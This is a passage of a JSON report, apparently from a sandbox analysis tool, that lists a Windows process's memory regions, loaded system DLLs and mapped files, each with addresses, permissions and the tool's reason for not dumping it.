"permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_2450", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:02:00.411", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2451", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:02:00.411", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2452", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:02:00.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_2453", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:02:00.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 3043327, "entry_point": 2621440, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2454", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2621440, "timestamp": "00:02:00.599", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4456447, "entry_point": 0, "filename": null, "id": "region_2455", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:02:00.599", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 540672, "start_va": 1907884032, "type": "region", "version": 1 }, "end_va": 1908424703, "entry_point": 1907890601, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_2456", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1907884032, "timestamp": "00:02:00.599", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1964310528, "type": "region", "version": 1 }, "end_va": 1964384255, "entry_point": 1964315713, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_2457", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1964310528, "timestamp": "00:02:00.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1964638208, "type": "region", "version": 1 }, "end_va": 1964941311, "entry_point": 1964670432, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_2458", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1964638208, "timestamp": "00:02:00.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1966145536, "type": "region", "version": 1 }, "end_va": 1966305279, "entry_point": 1966168249, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_2459", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1966145536, "timestamp": "00:02:00.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1966342144, "type": "region", "version": 1 }, "end_va": 1966997503, "entry_point": 1966426597, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_2460", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1966342144, "timestamp": "00:02:00.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1966997504, "type": "region", "version": 1 }, "end_va": 1967583231, "entry_point": 1967013809, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_2461", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1966997504, "timestamp": "00:02:00.602", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1968111616, "type": "region", "version": 1 }, "end_va": 1968771071, "entry_point": 1968317491, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_2462", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1968111616, "timestamp": "00:02:00.602", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1969881088, "type": "region", "version": 1 }, "end_va": 1970524159, "entry_point": 1970094039, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_2463", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1969881088, "timestamp": "00:02:00.603", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1970536448, "type": "region", "version": 1 }, "end_va": 1983422463, "entry_point": 1971066369, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_2464", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1970536448, "timestamp": "00:02:00.603", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1984954368, "type": "region", "version": 1 }, "end_va": 1985822719, "entry_point": 1985265124, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_2465", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1984954368, "timestamp": "00:02:00.604", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1988100096, "type": "region", "version": 1 }, "end_va": 1989525503, "entry_point": 1988409917, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_2466", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1988100096, "timestamp": "00:02:00.604", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1992032256, "type": "region", "version": 1 }, "end_va": 1992073215, "entry_point": 1992037228, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_2467", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1992032256, "timestamp": "00:02:00.605", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1992097792, "type": "region", "version": 1 }, "end_va": 1992921087, "entry_point": 1992218385, "filename": "\\Windows\\System32\\user32.dll", "id": "region_2468", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1992097792, "timestamp": "00:02:00.605", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1992949760, "type": "region", "version": 1 }, "end_va": 1994641407, "entry_point": 1992955879, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_2469", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1992949760, "timestamp": "00:02:00.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1994653696, "type": "region", "version": 1 }, "end_va": 1995358207, "entry_point": 1994695794, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_2470", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1994653696, "timestamp": "00:02:00.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1996685312, "type": "region", "version": 1 }, "end_va": 1996787711, "entry_point": 1996704117, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_2471", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1996685312, "timestamp": "00:02:00.607", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1996881920, "type": "region", "version": 1 }, "end_va": 1997238271, "entry_point": 1996987302, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_2472", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1996881920, "timestamp": "00:02:00.607", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1997340672, "type": "region", "version": 1 }, "end_va": 1997660159, "entry_point": 1997380617, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_2473", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1997340672, "timestamp": "00:02:00.607", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_2474", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:02:00.608", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3899391, "entry_point": 0, "filename": null, "id": "region_2475", "name": "pagefile_0x00000000002f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3080192, "timestamp": "00:02:00.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1983447040, "type": "region", "version": 1 }, "end_va": 1984282623, "entry_point": 1983452811, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_2476", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1983447040, "timestamp": "00:02:00.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988095999, "entry_point": 1987973973, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_2477", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:02:00.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_2478", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:02:00.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_2479", "name": "private_0x0000000000040000", "norm_filename": null, "region_type": "private_memory", "start_va": 262144, "timestamp": "00:02:00.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 356351, "entry_point": 0, "filename": null, "id": "region_2480", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:02:00.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_2481", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:02:00.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_2482", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:02:00.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 5509119, "entry_point": 0, "filename": null, "id": "region_2483", "name": "pagefile_0x0000000000440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4456448, "timestamp": "00:02:00.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 9711615, "entry_point": 0, "filename": null, "id": "region_2484", "name": "pagefile_0x0000000000550000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5570560, "timestamp": "00:02:00.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 10485760, "type": "region", "version": 1 }, "end_va": 23068671, "entry_point": 0, "filename": null, "id": "region_2485", "name": "pagefile_0x0000000000a00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10485760, "timestamp": "00:02:00.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_2486", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:02:00.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 23068672, "type": "region", "version": 1 }, "end_va": 26013695, "entry_point": 23068672, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2487", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 23068672, "timestamp": "00:02:00.631", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3940351, "entry_point": 0, "filename": null, "id": "region_2488", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:02:00.633", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1946288128, "type": "region", "version": 1 }, "end_va": 1947983871, "entry_point": 1946478261, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_2489", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1946288128, "timestamp": "00:02:00.633", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4001791, "entry_point": 3997696, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_2490", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 3997696, "timestamp": "00:02:00.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4071423, "entry_point": 0, "filename": null, "id": "region_2491", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:02:00.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 9764864, "type": "region", "version": 1 }, "end_va": 10141695, "entry_point": 9909689, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_2492", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 9764864, "timestamp": "00:02:00.646", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 26935296, "type": "region", "version": 1 }, "end_va": 27983871, "entry_point": 0, "filename": null, "id": "region_2493", "name": "private_0x00000000019b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 26935296, "timestamp": "00:02:00.646", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_2494", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:02:00.646", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1962475520, "type": "region", "version": 1 }, "end_va": 1962524671, "entry_point": 1962479841, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_2496", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1962475520, "timestamp": "00:02:00.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1944715264, "type": "region", "version": 1 }, "end_va": 1944977407, "entry_point": 1944756957, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_2497", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1944715264, "timestamp": "00:02:00.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 983040, "start_va": 27983872, "type": "region", "version": 1 }, "end_va": 28966911, "entry_point": 0, "filename": null, "id": "region_2498", "name": "private_0x0000000001ab0000", "norm_filename": null, "region_type": "private_memory", "start_va": 27983872, "timestamp": "00:02:00.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 26017792, "type": "region", "version": 1 }, "end_va": 26931199, "entry_point": 0, "filename": null, "id": "region_2499", "name": "pagefile_0x00000000018d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 26017792, "timestamp": "00:02:00.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4001791, "entry_point": 0, "filename": null, "id": "region_2500", "name": "pagefile_0x00000000003d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3997696, "timestamp": "00:02:00.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1989607424, "type": "region", "version": 1 }, "end_va": 1990143999, "entry_point": 1989616594, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_2501", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1989607424, "timestamp": "00:02:00.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4198399, "entry_point": 0, "filename": null, "id": "region_2502", "name": "pagefile_0x0000000000400000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4194304, "timestamp": "00:02:00.719", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1944977408, "type": "region", "version": 1 }, "end_va": 1945980927, "entry_point": 1945046430, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_2503", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1944977408, "timestamp": "00:02:00.722", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1937309696, "type": "region", "version": 1 }, "end_va": 1937444863, "entry_point": 1937314910, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_2504", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1937309696, "timestamp": "00:02:00.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1967783936, "type": "region", "version": 1 }, "end_va": 1968066559, "entry_point": 1967788513, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_2505", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1967783936, "timestamp": "00:02:00.725", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4276223, "entry_point": 4259840, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db", "id": "region_2506", "name": "cversions.1.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db", "region_type": "memory_mapped_file", "start_va": 4259840, "timestamp": "00:02:00.726", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 118784, "start_va": 9764864, "type": "region", "version": 1 }, "end_va": 9883647, "entry_point": 9764864, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db", "id": "region_2507", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db", "region_type": "memory_mapped_file", "start_va": 9764864, "timestamp": "00:02:00.727", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4329471, "entry_point": 0, "filename": null, "id": "region_2508", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:02:00.728", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1963196416, "type": "region", "version": 1 }, "end_va": 1963241471, "entry_point": 1963202962, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_2509", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1963196416, "timestamp": "00:02:00.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No 